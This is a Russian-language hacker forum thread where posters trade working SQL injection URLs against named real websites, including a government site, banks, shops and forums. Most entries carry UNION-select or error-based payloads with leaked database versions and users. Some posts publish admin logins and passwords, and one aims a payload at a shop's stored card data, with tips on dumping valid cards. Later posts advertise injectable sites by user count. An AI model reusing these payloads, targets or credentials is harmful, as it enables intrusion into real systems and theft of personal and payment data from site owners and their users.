Выкладываем SQL иньекции.

Выкладываем в этой теме найденые SQL иньекции.



Раскручиваем скулю до версии мускуля бд и юзера. Можно сразу на вывод определенной инфы.

Пример:


Код:
http://www.anonym.to...concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Version:5.0.77
Database:interplay
user:interplay@localhost


Иньекции такого вида не нужны будут удаляться.
http://site.com/news.php?id=4'

Код:
http://bpsca.co.uk/p...concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12--[COLOR=#]Version:[/COLOR]5.1.56-community-log
[COLOR=#]Database:[/COLOR]web231-website-1
[COLOR=#]User:[/COLOR][email protected]





Код:
http://newportrestau...concat(version(),0x3a,database(),0x3a,user()),5,6,7--[COLOR=#]Version:[/COLOR]5.0.51a
[COLOR=#]Database:[/COLOR]newporth_NHCSync
[COLOR=#]User:[/COLOR][email protected]





Код:
http://newagestudios...concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
[COLOR=#]Version:[/COLOR]5.0.45-community-nt
[COLOR=#]Database:[/COLOR]newagestudios
[COLOR=#]User:[/COLOR]newagestudios@localhost



Код:
http://naturalpaving...t 1,2,(version(),0x3a,database(),0x3a,user()),4,5,6,7,8--[COLOR=#]Version:[/COLOR]5.0.77-log
[COLOR=#]Database:[/COLOR]naturalpdb
[COLOR=#]User:[/COLOR][email protected]

Ковыряйте глядиш че нужного вам найдете

Код:
http://krushmore.com...concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--[COLOR=#]Version:[/COLOR]5.0.92-community
[COLOR=#]Database:[/COLOR]caribbe_main
[COLOR=#]User:[/COLOR]caribbe@localhost




Код:
http://intelligentfo...concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8--[COLOR=#]Version:[/COLOR]5.0.51a-community-nt
[COLOR=#]Database:[/COLOR]ifdb
[COLOR=#]User:[/COLOR]ifuser@localhost

Логин и пасс админа
admin:kissme

шоп - goodshop.cc
уязвимый параметр - логин
пример

PHP код:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((SELECT concat_ws(0x3a,card_fullinfo) FROM `cards` LIMIT 1,1), 1, 1000), FLOOR(RAND(0)*2))) --
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((SELECT concat_ws(0x3a,card_fullinfo) FROM `cards` LIMIT 2,1), 1, 1000), FLOOR(RAND(0)*2))) --

её только руками

CepbIu, спасибо за ответ)

Из-за капчи? Жаль что автоматом сдампить не получиться(

посчитай кол-во которое там сейчас, если >400, то сливай их от 400, тк <400 все мёртвые уже

а почему не получится? пара строк кода + антикапча

шопчик)
http://sexsense.hu/shop.php?kat=8
с дыркойimages/smilies/biggrin.gif

xttp://www.caredirect.eu/custom/shop/shop.php?action=1&type=2&retururl=%2F&value=4

Dagger Это просто ошибка мускула об коннекте к дб, а не скуля.
p.s. Тема бесполезная, пора сносить.

Немного Бангладеша images/smilies/smile.gif


_http://www.digitalbangladesh.gov.bd/content.php?CID=3&BlogCategory=24SQL

DB: reflbd_db

Админы:
Логин: kamalrahim
Пароль: letmein_1234
Мыло:[email protected]

Логин: admin
Пароль: blacky
Мыло: [email protected]

Reliance Finance Limited

_http://www.reflbd.com/section.php?menu_id=m509151887SQL

DB: eservice_digitalbd

Tables:

http://www.moneyex.c....4,5,6,7,8,9SQL

Админка http://www.moneyex.co.uk/admin/
Login: moneyxesite
Password: 7ptOe$nl

банк какой то
MySQL >= 5.0, шелл заливается прямо через скуль. Так же уязвимы параметры куки инж+скуль куки инж

админка

Американская биржа золота

http://www.amergold.....,11,12,13,14--

В БД ~70k юзеров юзеров (Имя, адрес, мыло, телефон...)

CPA-Bank


PHP код:
http://www.cpa-bank.dz/?p=publication_detail&publication_id=-8+union+select+1,version%28%29,3,4,5,6,7,user%28%29,9,10,11,12--
Таблица admin_user
Login: c*45adm
Pass hash: 42c25691557f00a25b77e7307ef67004

PHP код:
http://www.emaxxtech.com/view_faq.php?id=-1%20UNION%20select%201,version%28%29--
БД: emaxxtech

Таблица users
username
password
email

Всем здрасте.Вопрос http://www.******.ne...s.html?category[COLOR=#]Id=13[/COLOR] это уязвимость?Сори что поднимаю старую тему просто не знаю куда еще написать

фактически это запрос в бд, НО(!) фильтры могут тебе не позволить заскулить строку, попробуй банальной - '
если прокатит, строй дальше строку запроса

Код:
http://obook.ru/inde...,11,12,version(),14,15,16,17,18+--+User:root
file_priv есть, фильтрация имеется, но обходится двойным запросом, путей так и не нашел=.

на расхват свежий жирок​

56к юзверей
http://www.photograp...htm?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14&show=play​

145к юзверей
http://www.thaimtb.c...ewforum.php?f=3 or 1=[t] and 1=1​

50к юзверей
http://forums.rlfans...hp?f=34999999.9' union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13 and '0'='0​

20к юзверей
http://www.shaperoom....php?f=999999.9 union all select [t],2,3​

21к юзверей
http://www.interchim...gue.php?ref=249' and [t] and '1'='1&limite=7175​

45к юзверей
http://www.singapore...p?TYPE=999999.9 union all select 1,[t],3,4,5&CATID=197_198​

ЖИР 1.2кк юзверей
http://jasonbramblet...home1&key=home1' and [t] and '1'='1&_pge=3&_rec=10​

84к юзверей
https://www.501aucti...ickets?type=348' and [t] and '1'='1​

168к юзверей
https://booking.taip...hp?hid=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--​

212к юзверей
http://www.5figureda...m/?ref=999999.9' union all select 1,2,[t],4,5,6,7,8 and '0'='0​